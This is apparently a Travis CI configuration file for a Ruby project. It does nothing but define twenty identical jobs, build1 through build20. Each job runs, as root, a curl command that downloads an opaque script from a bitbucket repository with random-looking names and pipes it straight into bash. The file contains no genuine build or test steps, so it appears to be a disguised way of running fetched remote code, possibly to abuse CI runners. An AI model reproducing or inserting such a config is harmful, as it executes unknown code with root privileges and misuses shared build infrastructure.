language: ruby


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build2"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build3"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build4"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build5"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build6"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build7"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build8"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build9"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build10"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build11"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build12"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build13"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build14"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build15"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build16"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build17"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build18"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build19"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        
    -
      name: "build20"
      script:
        - sudo -u root curl https://bitbucket.org/yewejkur/jekyenu/raw/a0831ebdc1bcbdd0c84b7cfa95bf65e2f1c2bcd7/jeyek | bash
        